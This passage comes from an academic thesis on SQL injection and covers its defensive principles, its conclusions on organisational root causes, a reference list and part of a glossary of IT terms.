authentication, and so and so forth. If this principle had been put in place in the
«Real Environment Test» shown on the Experimenting chapter, accessing the file
system for creating a text file via the RDBMS would not have been possible.
Reducing the options for a cascade attack is always a good principle.
15
The enforcement of specified authorization rules based on positive identification of users and the systems or
data they are permitted to access

PRINCIPLE-BASED
DefensiveTactics
>
PRINCIPLE V
MASK ERROR MESSAGES
Error messages are a good source of information as they can prove to be a
valuable asset when exploiting a system (Anley 2002a;Anley 2002b;Boyd &
Keromytis 2004;Buehrer, Weide, & Sivilotti 2005;Cerrudo 2002;Huang et al.
2003;Kost 2003;Landsmann & Strömberg 2003;Maor & Shulman 2003;Maor &
Shulman 2004;McDonald 2002;Racciatti 2002;Sam M.S. 2005;SecuriTeam.com
2002;Spett 2002). This was neatly demonstrated on the Experimenting chapter,
hence, masking those will increase the overall level of security.
>
PRINCIPLE VI
DO NOT THINK OF IT INFRASTRUCTURE AS COMMODITY: HARDENING AND PATCHING ARE AS
IMPORTANT AS ALL OF THE APPLICATION-LEVEL SECURITY STRATEGIES
Because the skill set of infrastructure management and application development is
so different, developers tend not to think of IT infrastructure as something they
should care about, but as something that is there to serve their purposes. The
problem is that rarely an application is standing on its own, or is built entirely from
scratch. For example, a Web application depends on the existence of a Web server,
and not rarely, on some kind of applicational framework such as the ASP.NET, JSP,
etc. If true the application is the primary target for the injection attack, the
surrounding environment is what enables the perpetration of the attack. Reducing
the number of hijackable services and known vulnerabilities is highly desirable.
>
PRINCIPLE VII
PATCH THE DEVELOPER/DBA GAP
This principle pretty much summarizes on a high-level principle all of the previous
principles. The success of SQL Injection is in great measure tied-up to developers
not thinking as DBAs, and DBAs looking into development as something
completely alien to their job description. Patching this gap can be the best remedy.

Chapter 7
CONCLUSIONS
Knowledge creation is achieved through recognition of the
synergistic relationship between tacit and explicit
knowledge in the organization, and through the design of
social processes that create new knowledge by
converting tacit knowledge into explicit knowledge.
This final chapter is primarily a wrap-up summary of the findings yielded by this
research effort. It presents a final argument of the results and what did this work
accomplish in terms of bridging the gap between different bodies of Knowledge.
In addition to presenting a reflective perspective of this work’s contributions, an
evolutionary vision if offered by combining the implications of the results with
the underlying limitations of the research toward the formulation of additional
follow-up research in this field.

conclusions •
INTRODUCTION
Conclusions
4INTRODUCTION
Regarding the production and usage of Knowledge within organizations, Choo (1996)
states that «knowledge creation is achieved through a recognition of the synergistic
relationship between tacit and explicit knowledge in the organization, and through the
design of social processes that create new knowledge by converting tacit knowledge into
explicit knowledge». Choo upholds the model proposed by Nonaka & Takeuchi (1995)
regarding how organizations create Knowledge. This model defines tacit knowledge as
being of personal nature, and therefore hard to formalize and transmit to others. By
opposition, explicit knowledge is of formal nature, ideal for transmitting across people
and groups. According to this model, the knowledge lifecycle encompasses four modes:
socialization, externalization, combination, and internalization:
Figure 39 - The Knowledge Creation Cycle
> adapted from (Choo 1996) <

conclusions •
INTRODUCTION
Conclusions
Whereas socialization is the process of acquiring tacit knowledge trough sharing
experiences, externalization recurs to metaphors, analogies, and models to convert tacit
knowledge into explicit knowledge. This scenario is commonly used during the creation
phase of new product development (Choo 1996). According to the same source,
combination aims at creating explicitly knowledge from incorporating other sources of
explicit knowledge.
This research is a blend of externalization and combination. A deductive approach using
experimentation was used as primary means for producing knowledge. This knowledge
was greatly systemized using analogies and models (see the «Survey of Existing
Techniques» section of the Attack Taxonomy chapter) in order to convert Knowledge
residing on the tacit realm into scientific Knowledge, organized in a systematic way. This
predilection for analogies and models as tools for formulating new Knowledge can in
great measure be explained by the analogy of creating a new product, known to heavily
rely on externalization. Subsequently, creating a new product is exactly what this work
sets out as its prime objective, proposing the very first taxonomy of SQL Injection attacks
(see the «Taxonomy Formulation» section of the Attack Taxonomy chapter). Additionally,
as established during the critical literature process (chapter Literature Review), the
research topic is still rather obscure, scattered across hacking and underground sources in
an ad-hoc fashion. If to this fact, the infinite variations of SQL Injection attacks are added,
then analogies and models seem to be probably the only feasible way of systemizing this
body of Knowledge.
With the purpose of building internal validity, this work recurred to the combination of
supplementary sources that could offer additional insight on the subject, including
academic, underground and industry fonts. Though answering to the research question
looks pretty straightforward, addressable by experimentation, the hard work lies beneath.

conclusions •
INTRODUCTION
Conclusions
Answering to any research question requires a solid basis of explicit Knowledge, but in
the current context this basis is far from solid. For this reason, this work had to build the
necessary theoretical basis and articulate it with the practical means available. This activity
was achieved by surveying existing SQL Injection techniques and then formulating a
structure in the form of a taxonomy. Hence, the added value of this research does not lie
directly on the research question, but on the underlying steps of the research. The scope
of this study is therefore rather wide as it begins by formulating a theoretical framework
and goes all the way up to experimenting with the findings, thus building additional
internal validity (see chapter Experimenting). Moreover, since one of the objectives of this
work is to expose the SQL Injection threat an educate IT professionals, this study also
includes a set of preventive tactics (see chapter Defensive Tactics) that could help
developers, sysadmins and other researchers to reduce, and hopefully completely
eliminate, the SQL Injection threat.

conclusions •
DISCUSSION OF RESULTS
Conclusions
4DISCUSSION OF RESULTS
Due to the wide scope of this research, numerous results were obtained on several fronts,
providing a multi-vector approach into the research topic. Somewhat surprisingly, the
first conclusion is that SQL Injection is a lot more than a pure technology-related topic.
Figure 40 - The Height of People, Processes, Policies and Technology in SQL Injection
PPeeooppllee
§§ RRoolleess aanndd RReessppoonnssiibbiilliittiieess
§§ PPeeooppllee MMaannaaggeemmeenntt
§§ SSkkiillllss MMaannaaggeemmeenntt
PPrroocceesssseess
§§ DDeessiiggnn aanndd MMooddeelliinngg
§§ CCoommpplliiaannccee
§§ CCoonnttiinnuuoouuss IImmpprroovveemmeenntt
PPoolliicciieess
§§ AAuuttoommaattiioonn
§§ SSttaannddaarrddiizzaattiioonn
§§ GGoovveerrnnaannccee
§§ TTeemmppllaatteess
TTeecchhnnoollooggyy
§§ IITT ,, ttoooollss
Organizational
Factors Methodological
Factors
Technological
Factors
BBuussiinneessss CChhaalllleennggeess
rreemmaaiinn tthhee ssaammee
BBuussiinneessss PPrroobblleemmss
rreemmaaiinn tthhee ssaammee

conclusions •
Conclusions
This conclusion was drawn from observing the evolutionary path organizations
undergone during the period SQL Injection emerged. The “I” for Information in corporate
IT did not include people. Nowadays many argue that computer systems only deal with
data which can only be converted into information by a sentient being through
interpretation. Currently only humans fit into this definition. Regardless if computer
systems deal with data or information, one thing is sure, humans are definitely part of
the Information System, in fact, they are the primary, if not ultimately the only, reason for
an Information System to exist. War breakout between technologists and people from
the business side as organizations striven to increase the empowerment of their
employees. But opening technology to people implied letting go what technologists
defended the most: formality. Human-related systems, e.g. decision support systems, are
by definition very much informal, whereas core business applications, e.g. ERPs or a
banking Mainframe, are still highly formal. Still, even the most formal systems currently
depend on informal systems to receive and deliver data. A good example is the core
banking line of business application – a very strict and formal system almost nobody is
allowed to touch and often residing on a bunker – is nowadays indirectly exposed on the
internet allowing customers to perform financial transactions from home. Like an iceberg
whose tip is only a small fraction of its real size, often when there is an issue that looks as
being pure technical, it turns out to be far more complex as the biggest ballast is kept out
of sight under the waterline. SQL Injection is no exception. Many tried to find a quick fix
to the problem using technology alone and failed (see the «Technology-Based» section of
the Defensive Tactics chapter). Others blamed developers, the people side of the
Information System, as being the sole responsibles for the threat. There are others who
point out rapid development cycles, the processes piece, and the lack of standardization,
the policies part, as causes for SQL Injection. These viewpoints do offer a glimpse into the
topic, but they all failed in providing a solution to the problem as it still persists.

conclusions •
Conclusions
The second conclusion derives from the first. The SQL Injection threat is still to be solved
although there are some countermeasures available. Yes, there are some technology
countermeasures that are very effective, e.g. the failsafes on the Microsoft .NET
Framework 2.0. Yes, training people and making them aware of the problem will
significantly reduce the risk. Yes, more controlled development cycles with proper quality
assurance can be an asset in mitigating risks and yes, policies such as standardization and
templates can also give a hand. Still, the harsh reality remains. The problem is still here,
maybe more controlled, but still present.
This chain of conclusions leads to the third conclusion of this work. If an effective solution
is ever to be found it must unify technology, people, processes, and policies, while
accounting for the business problems and challenges organizations are faced with. This is
no simple endeavour and for the time being the best means of unifying these factors is
through the use of principles. Principles can incorporate elements from all natures or
target a specific factor or issue. The good thing though is that principles allow building
depth in a way that a top level principle can reference other principles that address
specific sets of issues. A comprehensive set of first line of defence principles in a logic
where 20% effort will reduce 80% risk has been formulated and compiled on the
«Principle-Based» section of the Defensive Tactics section.
The forth and last conclusion is that the research question «Can the weakness of modern
e-Business systems be demonstrated by proving SQL Injection techniques to be effective
in obtaining and altering private business data?» was answerable and the response is
affirmative as per the Experimenting chapter. All the code samples presented throughout
this work as well as the attack perpetrated as basis for addressing the research question
could be rendered ineffective if the principles proposed in this work had been put to
action.

conclusions •
CONTRIBUTIONS OF THIS WORK
Conclusions
4CONTRIBUTIONS OF THIS WORK
One of the early goals of this work was to build new scientific Knowledge and empower
others to continue developing new means of defence, but also to expose the threat in a
systemized way in order to benefit the global IT community as well. The following list
summarizes the main contributions of this work to science and to the IT community:
Ø Exposes the SQL Injection threat using a comprehensive approach;
Ø Presents a global view of the root causes of SQL Injection, centring the topic
on organizations instead of treating it as a pure technology issue;
Ø Builds explicit Knowledge through the use of an extensive set of examples
and code samples that encompass a wide scope of scenarios and systems
under threat;
Ø Proposes the first unifying definition of SQL Injection;
Ø Proposes the first taxonomy of SQL Injection attacks;
Ø By structuring the different types of attacks in a taxonomy, it empowers
others in the quest for fully understanding the topic, toward the
development of a widespread remedy yet to be accomplished;
Ø Compiles a rich set of principles that could be used as defensive tactics
against SQL Injection at present date.

conclusions •
IMPLICATIONS
Conclusions
4IMPLICATIONS
If there is a direct implication that can be withdrawn from this work is that it urges
developers, sysadmins, analysts, researchers and any in general who deal with databases
as part of their professional life on a Call-To-Action. New safeguards have to be
developed and start being put in place, developers have to become aware of the threat
and start coding defensively, organizations have to find the right balance between
time-to-market and quality assurance, and most of all, behaviours have to be significantly
changed.
Another direct implication of this work’s findings is that any attempt to remedy the
threat that centers itself on technology alone, or people, or any of the remaining factors
is deemed to fail. SQL Injection requires a unifying approach in order to be properly
addressed.
Finally, there is much to accomplish in the field of researching for a solution. Up till now,
the threat itself had not been structured, thus making additional research more difficult.
With a taxonomy to start with, others can more easily build new Knowledge in the field
of prevention, at the same time IT professionals can start minimizing risks from their end.

conclusions •
LIMITATIONS OF THIS WORK
Conclusions
4LIMITATIONS OF THIS WORK
The infinite variations of SQL Injection attacks constitute a limitation to any work on the
subject. The success of logical attacks is largely dependant on the countless runtime
interactions of different applicational components, making it almost impossible to predict
the true behaviour of the application, especially for large complex systems. Inevitably, all
the samples, examples, and scenarios presented are a mere shadow of a more broad
reality and were designed to imprint a viewpoint on the reader’s mind. Therefore, there is
still lots of room for other researchers to add to our common Knowledge of SQL Injection
by presenting their unique insight of the topic.
Another limitation of this work is that it performed little experimentation as the research
question did not require multiple test subjects. Additional experimentation would serve
to solidify the taxonomy and bring additional insight about the true repercussions of SQL
Injection.
Finally, this work is all about exposing and not preventing, though a first line of defensive
tactics was included on a dedicated chapter. Hence, a comprehensive guide of existing
countermeasures against SQL Injection attacks was not presented.

conclusions •
FURTHER INVESTIGATION
Conclusions
4FURTHER INVESTIGATION
Further investigation could be formulated from the implications and the limitations of
this work. Without given it too much thought, probably the vastest field for research
around the SQL Injection topic stands in the prevention field. Still, SQL Injection is just
one among many types of logical attacks nowadays threatening distributed applications.
The following list is a suggestion of additional research that would relate directly to the
Knowledge produced by this work:
Ø Additional surveys of the existing SQL Injection variations and scope of
attack;
Ø Additional analysis of patterns in behaviours that could indicate the presence
of a SQL Injection attack in order to enrich the databases of application-level
firewalls and intrusion detection systems;
Ø Further experimentation on additional e-Business platforms in order to
validate the proposed taxonomy;
Ø Assessing the impact of code injection attacks on an increasingly complex
mesh of Web services connecting organizations across security boundaries
on a global scale;
Ø Compilation of a comprehensive survey of existing principles that could be
used to harmonize the business challenges and problems with the formality
required to minimize injection attacks.

• r e f e r e n c e s •
references • r e f e r e n c e s •
Hacking with SQL Injection Exposed CCXXV
REFERENCES
References
Introduction to Databases for web developers. 2006.
http://www.extropia.com/tutorials/sql/toc.html.
eXtropia - the open Web technology company.
A.Race, S. 2003, eCo II / Business Services Registry
Workshop: Final Report.
Álvarez, G. & Petrovic, S. 2003, "A new taxonomy of
web attacks suitable for efficient encoding", Computers
and Security, vol. 22, no. 5, pp. 435-449.
Anley, C. 2002b, Advanced SQL Injection, NGSSoftware
Insight Security Research (NISR),
http://www.nextgenss.com/papers/advanced_sql_
injection.pdf.
Anley, C. 2002a, (more) Advanced SQL Injection,
NGSSoftware Insight Security Research (NISR),
http://www.nextgenss.com/papers/more_advanced_s
ql_injection.pdf.
ANSI/IEEE 1471. IEEE Recommended practice for
architectural description of software-intensive
systems. 2000. IEEE.
Avison, D. E., Lau, F., Myers, M. D., & Nielsen, P. A.
Action research. 42[1], 94-97. 1999. ACM Press.
Communications of the ACM.
Barry, D. K. 2003, Web Services and Service-Oriented
Architectures: The Savvy Manager's Guide Morgan
Kaufmann Publishers.
Baskerville, R. L. "Action Research For Information
Systems", in Fifth Americas Conference on Information
Systems, Association for Information Systems.
Bell, J. 1999, Doing Your Research Project: A Guide for
First-Time Researchers in Education and Social Science,
Third Edition edn.

Hacking with SQL Injection ExposedCCXXVI
Blake, W. 2003, A "Black Box" Audit of a Microsoft
.NET web-based application - An External Auditor's
Perspective, SANS Institute.
Boyd, S. W. & Keromytis, A. D. "SQLrand: Preventing
SQL Injection Attacks", pp. 292-302.
Buehrer, G. T., Weide, B. W., & Sivilotti, P. A. G.
"Using parse tree validation to prevent SQL injection
attacks", in 5th international workshop on Software
engineering and middleware, ACM Press, pp. 106-113.
Calladine, J. 2004, "Giving legs to the legacy — Web
Services integration within the enterprise", BT
Technology Journal, vol. 22, no. 1.
Carnegie Mellon University Software Engineering
Institute. Glossary at Carnegie Mellon University
Software Engineering Institute. 2006.
http://www.sei.cmu.edu/opensystems/glossary.html.
2006.
Cerrudo, C. 2002, Manipulating Microsoft SQL Server
Using SQL Injection, Application Security, Inc.,
http://www.appsecinc.com/presentations/Manipulating
_SQL_Server_Using_SQL_Injection.pdf.
Chakrabarti, S. 2003, Mining The Web: Discovering
Knowledge From Hypertext Data Morgan Kaufmann
Publishers.
Choo, C. 1996, "The Knowing Organization: How
Organizations Use Information to Construct Meaning,
Create Knowledge, and Make Decisions", International
Journal of Information Management, vol. 16, no. 5, pp.
329-340.
Cormack, D. 1991, The Research Process in Nursing,
4th Edition edn, Blackwell Publishing.
Dawson, C. 1999, Practical Research Methods How To
Books, Ldt..
Encyclopædia Britannica. Information Processing.
2006. http://search.eb.com/eb/article-61668.
Encyclopædia Britannica Online.
Endrei, M., Ang, J., Arsanjani, A., Chua, S., Comte, P.,
Krogdahl, P., Luo, M., & Newling, T. 2004, Patterns:
Service-Oriented Architecture and Web Services, 1st
Edition edn, IBM.
Erl, T. 2004, Service-Oriented Architecture: A Field
Guide to Integrating XML and Web Services Prentice
Hall PTR.
Finnigan, P. 2002, SQL Injection and Oracle
http://www.securityfocus.com/infocus/1644.
Gabriela Barrantes, E., H.Ackley, D., & Forrest, S.
Randomized instruction set emulation to Disrupt
Binary Code Injection Attacks. 8[1], 3-40. 2005. ACM
Press. ACM Transactions on Information and System
Security (TISSEC).
Gartner Group 2002, Gartner Dataquest Alert, The
Gartner Group.
Gartner Group 2003, Gartner Dataquest Alert, The
Gartner Group.
Gartner Group 2004, Gartner Web Services Magic
Quadrant, Gartner Group.
Gaurav, S. K., Angelos, D. K., & Vassilis, P.
"Countering Code-Injection Attacks With Instruction-
Set Randomization", in Conference on Computer and
communications security, ACM Press, pp. 272-280.
Gephart, R. P. U. o. A. 1999a, Paradigms and Research,
Research Methods Forum,
http://www.aom.pace.edu/rmd/1999_RMD_Forum_P
aradigms_and_Research_Methods, 52.
Gephart, R. Paradigms and Research Methods. 1999b.
http://www.aom.pace.edu/rmd/1999_RMD_Forum_P
aradigms_and_Research_Methods.htm, University of
Alberta. 2006b.
Gollmann, D. 2006, Computer Security, Second Edition
edn, John Wiley & Sons.

Hacking with SQL Injection Exposed CCXXVI
Halfond, W. G. J. & Orso, A. "AMNESIA: Analysis and
Monitoring for NEutralizing SQLInjection Attacks", in
20th IEEE/ACM international Conference on Automated
software engineering, ACM Press, pp. 174-183.
Halfond, W. G. J. & Orso, A. "Combining Static
Analysis and Runtime Monitoring to Counter
SQLInjection Attacks", in Third international workshop
on Dynamic analysis, ACM Press New York, NY, USA,
pp. 1-7.
Hancock, B. 1998, An Introduction to Qualitative
Research, University of Nottingham,
http://faculty.uccb.ns.ca/pmacintyre/course_pages/MB
A603/MBA603_files/IntroQualitativeResearch.pdf#sea
rch=%22%22An%20Introduction%20to%20Qualita
tive%20Research%22%20Hancock%22.
Hansman, S. 2002, A Taxonomy of Network and
Computer Attack Methodologies, Honours thesis,
University of Canterburry.
Hek et al. 2000, "Systematically searching and
reviewing literature", Nurse Researcher, vol. 7, no. 3,
pp. 40-57.
Howard, M. & LeBlanc, D. 2003, Writing Secure Code,
Second Edition edn, Microsoft Press.
Huang, Y.-W., Huang, S.-K., Lin, T.-P., & Tsai, C.-H.
"Securing Web Application Code by Static Analysis and
Runtime Protection", in International World Wide Web
Conference, ACM Press, pp. 40-52.
Huang, Y.-W., Huang, S.-K., Lin, T.-P., & Tsai, C.-H.
"Web application security assessment by fault injection
and behavior monitoring", in International World Wide
Web Conference, ACM Press New York, pp. 148-159.
Human Engineering. Definitions from Human
Engineering. 1998.
http://www.manningaffordability.com/s&tweb/HEReso
urce/Other/Definitions.htm. 2006.
Hutchinson, S. 2004, Foundations for research –
Methods of inquiry in education and the social sciences
Lawrence Erlbaum associates, London.
Huth EJ. How to Write and Publish Papers in Medical
Sciences. 1982. 64, Philadelphia: ISI Press.
IBM. Autonomic Computing. 2005.
http://www.research.ibm.com/autonomic/.
IEEE 1220. IEEE Standard for Application and
Management of the Systems Engineering Process.
1998. IEEE.
Institute of Education Sciences (IES). Glossary at
National Center for Education Statistics. 2006.
http://nces.ed.gov/pubs98/tech/glossary.asp.
Jari A.Lehto & Pentti Marttiin "Experiences in System
Architecture Evaluation: A Communication View for
Architectural Design", in HICSS '05. 38th Annual Hawaii
International Conference on System Sciences, IEEE, p.
312c.
Joshi, J., Aref, W., Ghafoor, A., & Spafford, E. Security
Models for Web-Based Applications. 44[2], 38-44.
2001. ACM Press. Communications of the ACM.
Kenneth W.Borland Jr. 2001, "New directions for
institutional research", New Directions for Institutional
Research, vol. 112, pp. 5-13.
Kost, S. 2003, An Introduction to SQL Injection Attacks
for Oracle Developers, Integrigy Corporation,
http://www.net-
security.org/dl/articles/IntegrigyIntrotoSQLInjectionAtt
acks.pdf.
Kunene, G. 2003, The Database Holds Your Core
Assets—Protect It First.
Landsmann, U. B.-A. & Strömberg, D. 2003, Web
Application Security: A Survey of Prevention Techniques
Against SQL Injection, Research Thesis, Stockholm
University; University of California.

Hacking with SQL Injection ExposedCCXXVII
Lebowitz, M. The importance of laboratory
experimentation in IS research. 1998. ACM Press.
Communications of the ACM.
Lee, A. S. 1989, "A Scientific Methodology for MIS
Case Studies", MIS Quarterly pp. 33-50.
Linn, C. M., Rajagopalan, M., Baker, S., Collberg, C.,
Debray, S. K., Hartman, J. H., & Moseley, P. A Multi-
Faceted Defence Mechanism Against Code Injection
Attacks. 2004.
http://www.cs.arizona.edu/~linnc/research/CCS2004.
pdf. Department of Computer Science, University of
Arizona.
Livshits, V. B. & S.Lam, M. 2005, Finding Security
Vulnerabilities in Java Applications with Static Analysis,
Stanford University,
http://suif.stanford.edu/papers/usenixsec05.pdf.
M.T.Gamble & R.Gamble, M. H. "Understanding
Solution Architecture Concerns", in International
Conference on Software Engineering.
Maor, O. & Shulman, A. 2003, Blindfolded SQL
Injection, Imperva,
http://www.imperva.com/application_defense_center/
white_papers/blind_sql_server_injection.html.
Maor, O. & Shulman, A. 2004, SQL Injection
Signatures Evasion, Imperva,
http://packetstormsecurity.com/papers/bypass/SQL_In
jection_Evasion.pdf.
McDonagh, J. Investigating the dynamics of IT-enable:
The appeal of clinical inquiry. 2004. Idea group,
Ireland. The handbook of information systems
research.
McDonald, S. 2002, SQL Injection: Modes of attack,
defence, and why it matters
http://www.sans.org/rr/papers/3/23.pdf.
McGovern, J., Tyagi, S., Stevens, M., & Matthew, S.
2003, Java Web Services Architecture Morgan Kaufmann
Publishers.
Melton, J. 1996, "SQL language summary", ACM
Comput.Surv., vol. 28, no. 1, pp. 141-143.
Microsoft. Core Principles of the Dynamic Systems
Initiative. 2005.
http://www.microsoft.com/windowsserversystem/dsi/
dsicore.mspx%20.
Microsoft 6 A.D.a, SQL Server 2005 Books OnLine - OLE
DB Provider for Microsoft Directory Services, Microsoft,
http://msdn2.microsoft.com/en-
us/library/ms190803.aspx.
Microsoft 6 A.D.b, SQL Server 2005 Books OnLine - OLE
DB Provider for Microsoft Directory Services, Microsoft,
http://msdn2.microsoft.com/en-
us/library/ms190803.aspx.
Microsoft 2006, SQL Server 2005 Books Online,
Microsoft,
http://www.microsoft.com/downloads/details.aspx?Fa
milyID=be6a2c5d-00df-4220-b133-29c1e0b6585f.
Miles, M. B. & Huberman, A. M. 1994, Qualitative
Data Analysis Sage, Thousand Oaks, CA.
Nguyen-Tuong, A., Guarnieri, S., Greene, D., & Evans,
D. 2004, Automatically Hardening Web Applications
Using Precise Tainting, University of Virginia,
http://www.cs.virginia.edu/evans/pubs/infosec05.pdf,
CS-2004-36.
Nonaka, I. & Takeuchi, H. The Knowledge Creating
Company: How Japanese Companies Create the
Dynamics of Innovation. 1995. New York, Oxford
University Press.
O'Brien, L., Bass, L., & Merson, P. 2005, Quality
Attributes and Service-Oriented Architectures, Carnegie
Mellon Software Engineering Institute,
http://www.sei.cmu.edu/publications/documents/05.re
ports/05tn014/05tn014.html, CMU/SEI-2005-TN-014.
Open Group Architecture Framework. TOGAF 8.1
Enterprise Edition. 2005.

Hacking with SQL Injection Exposed CCXXIX
http://www.opengroup.org/bookstore/catalog/g051.ht
m.
OWASP. The Open Web Application Security Project.
[A guide to building secure Web applications]. 2006.
http://www.owasp.org. Online Documentation.
Pietraszek, T. & Berghe, C. V. "Defending Against
Injection Attacks through Context-Sensitive String
Evaluation", in RAID2005,
http://tadek.pietraszek.org/publications/pietraszek05_
defending.pdf.
Racciatti, H. M. 2002, Técnicas de SQL Injection: Un
Repaso www.hackyashira.com.
Saltzer, J. H. & Schroeder, M. D. "The protection of
information in computer systems", in Fourth ACM
Symposium on Operating System, ACM,
http://web.mit.edu/Saltzer/www/publications/protecti
on, pp. 1278-1308.
Sam M.S. 2005, SQL Injection Protection by Variable
Normalization of SQL Statement
http://www.securitydocs.com/pdf/3388.PDF.
Sarker, S. & Lee, A. S. "Using a positivist case research
methodology to test a theory about IT-enabled
business process redesign", in International conference
on Information systems, pp. 237-252.
Saunders, M., Lewis, P., & Thornhill, A. 2003, Research
Methods For Business Students, Third Edition edn,
Pearson Education Limited.
Scott Dawson, Farnam Jahanian, & Todd Mitton 2006,
"Experiments on Six Commercial TCP
Implementations Using a Software Fault Injection
Tool", Software: Practice and Experience, vol. 27, no.
12, pp. 1385-1410.
Scott, D. & Sharp, R. "Abstracting application-level
web security", in 11th international conference on
World Wide Web, ACM Press, pp. 396-407.
SecuriTeam.com 2002, SQL Injection Walkthrough,
SecuriTeam.com,
http://www.securiteam.com/securityreviews/5DP0N1
P76E .html.
Spett, K. 2002, Sql Injection: Are Your Web Applications
Vulnerable?
http://www.spidynamics.com/support/whitepapers
/WhitepaperSQLInjection.pdf.
SPI Labs 2003, Web Application Security Assessment,
SPI Labs.
The National Center for Education Statistics. The
National Center for Education Statistics Glossary.
2002. http://nces.ed.gov/pubs98/tech/glossary.asp.
2006.
The Radicati Group, I. 2006, Microsoft Exchange
Market Share Statistics, The Radicati Group, Inc,
http://download.microsoft.com/download/E/8/A/E8A1
54BF-CC35-4340-BD26-
6265CDB06B6E/ExStats.doc#_Toc108584507.
Thomas Connolly, Carolyn Begg, & Ann Strachan
1999, Database Systems - A Practical Approach to
Design, Implementation, and Management Addison -
Wesley.
unknown. Hackvideo - SQL-injection. 2005c. e2k.
unknown. Hacking Store via SQL Injection by
(vitamin_fosfat) (b_ice).avi. 2005b. e2k. 5-11-2005b.
unknown 2005a, A Step by Step Guide to SQL Injections
e2k.
Viega, J. & Messi, M. 2004, "Security is Harder than
You Think", Queue, vol. 2, no. 5, pp. 60-65.
W3 Schools 2006, ASP ServerVariables Collection
http://www.w3schools.com/asp/coll_servervariables.a
sp.
W3C. Web Services Glossary. 2004. Worldwide Web
Consortium.

Hacking with SQL Injection ExposedCCXXX
Waymire, R. Hacking Databases - SQL Injection
Attacks and Common Configuration Mistakes. 2004.
Microsoft. Microsoft Tech-Ed 2004.
Whitman, M. E. & Woszczynski, A. B. The Handbook
of Information Systems Research. 2004. Idea Group
Publishing.
Wikipedia. SQL injection. Wikipedia, the free
encyclopedia . 2006f.
http://en.wikipedia.org/wiki/SQL_injection.
Wikipedia. Legacy system. Wikipedia . 2006e.
Wikipedia. Database. 2006d.
http://en.wikipedia.org/wiki/Database. 2006d.
Wikipedia. SQL. 2006c. 2006c.
Wikipedia. Taxonomy. 2006b.
http://en.wikipedia.org/wiki/Taxonomy.
Wikipedia. Systems architecture. 2006a.
http://en.wikipedia.org/wiki/Systems_architecture,
Wikipedia.
Wixon, D. Qualitative research methods in design and
development. 2[4], 19-26. 1995. ACM Press.
Interactions.
Xu, W., Bhatkar, S., & Sekar, R. 2005, A Unified
Approach for Preventing Attacks Exploiting a Range of
Software Vulnerabilities, Stony Brook.
Yi, H. & Brajendra, P. "A data mining approach for
database intrusion detection", in 2004 ACM symposium
on Applied computing, ACM Press.
Yin, R. K. Case Study Research: Design and Methods.
Revised Edition. 1989. Sage, Beverley Hills, CA.
Yip Chung, C., Lieu, R., Liu, J., Luk, A., Mao, J., &
Raghavan, P. "Thematic mapping - from unstructured
documents to taxonomies", in Conference on
Information and Knowledge Management, ACM Press,
pp. 608-610.
Yuhanna, N. 2003, Nailing Down Four Key DBMS
Security Issues, Forrester Research, Inc..
Yuhanna, N. & Schwaber, C. E. Securing SQL Server
DBMS. 2004. Forrester Research, Inc. Best
Practices.

Hacking with SQL Injection Exposed CCXXXI
GLOSSARY
4GL Acronym for Fourth-Generation Programming
Language. A programming language designed with a
specific purpose in mind, such as the development of
commercial business software.
ATM Acronym for Asynchronous Transfer Mode A
high bandwidth, High speed (up to 155 Mbps),
controlled-delay fixed-size packet switching and
transmission system integrating multiple data types
(voice, video, and data). Uses fixed-size packets also
known as "cells" (ATM is often referred to as "cell
relay").
Buffer Overflow This happens when more data is
put into a buffer or holding area, then the buffer can
handle. This is due to a mismatch in processing rates
between the producing and consuming processes.
This can result in system crashes or the creation of a
back door leading to system access.
Cookie A cookie is a small piece of data which is
sent from a Web server to a Web browser and stored
locally on the user's machine. The cookie is stored on
the user's machine but is not an executable program
and cannot do anything to the machine. Whenever a
Web browser requests a file from the same Web
server that sent the cookie, the browser sends a copy
of that cookie back to the server. A Cookie can
contain information such as user ID, user preferences,
archive shopping cart information, etc. Cookies can
contain Personally Identifiable Information.
CRM Acronym for customer relationship
management. CRM entails all aspects of interaction a
company has with its customer, whether it be sales or
service related. CRM an information industry term for
methodologies, software, and usually Internet
capabilities that help an enterprise manage customer
relationships in an organised way.
CVE Acronym for Common Vulnerabilities and
Exposures. CVE is a dictionary-type list of
standardized names for vulnerabilities and other
information related to security exposures. CVE aims
to standardize the names for all publicly known
vulnerabilities and security exposures. The goal of

• g l o s s a r y •
glossary • g l o s s a r y •
Hacking with SQL Injection ExposedCCXXXII
CVE is to make it easier to share data across separate
vulnerable databases and security tools.
DBA Acronym for database administrator. Person
responsible for system tuning as well as the structure
of the tables within the database, the number of
instances to run, and other parameters.
DCL Acronym for Data Control Language. Is a
computer language and a subset of SQL, used to
control access to data in a database.
DDL Acronym for Data Definition Language. SQL
statements that can be used either interactively or
within programming language source code to define
databases and their components.
DML Acronym for Data Manipulation Language.
SQL statements that can be used either interactively
or within programming language source code to
access and retrieve data stored in a database
management system.
DoS Acronym for Denial of Service. A type of
attack that tries to block a network service by
overloading the server.
ERP Acronym for Enterprise Resource Planning. An
information system that integrates all manufacturing
and related applications for an entire enterprise.
Ethernet A computer network cabling system
designed by Xerox in the late 1970s. Originally
transmission rates were 3 Megabits per second (Mb/s)
over thick coaxial cable. Media today include fiber,
twisted-pair (copper), and several coaxial cable types.
Rates are up to 10 Gigabits per second or 10,000Mb/s.
Firewall A firewall is a hardware or software
solution to enforce security policies. In the physical
security analogy, a firewall is equivalent to a door lock
on a perimeter door or on a door to a room inside of
the building - it permits only authorized users such as
those with a key or access card to enter. A firewall has
built-in filters that can disallow unauthorized or
potentially dangerous material from entering the
system. It also logs attempted intrusions.
FTP Acronym for File Transfer Protocol. A very
common method of moving files between two
Internet sites. FTP is a way to login to another
Internet site for the purposes of retrieving and/or
sending files. FTP was invented and in wide use long
before the advent of the World Wide Web and
originally was always used from a text-only interface.
Hardening A defence strategy to protect against
attacks by removing vulnerable and unnecessary
services, patching security holes, and securing access
controls.
HTTP Acronym for Hypertext Transfer Protocol. Is
the set of rules for exchanging files (text, graphic
images, sound, video, and other multimedia files) on
the World Wide Web. Relative to the TCP/IP suite of
protocols (which are the basis for information
exchange on the Internet), HTTP is an application
protocol.
HTTPS Acronym for Secure Hypertext Transport
Protocol. HTTP with SSL encryption for security.
IP Acronym for Internet Protocol. Defines how
information gets sent between servers or systems
across the Internet
ISO Acronym for International Standards
Organization. They do not create standards but (as
with ANSI) provide a means of verifying that a
proposed standard has met certain requirements for
due process, consensus, and other criteria by those
developing the standard.
IT Acronym for Information Technology. Includes all
matters concerned with the furtherance of computer
science and technology and with the design,
development, installation, and implementation of
information systems and applications [San Diego State
University].
IT Architecture An integrated framework for
acquiring and evolving IT to achieve strategic goals. It
has both logical and technical components. Logical
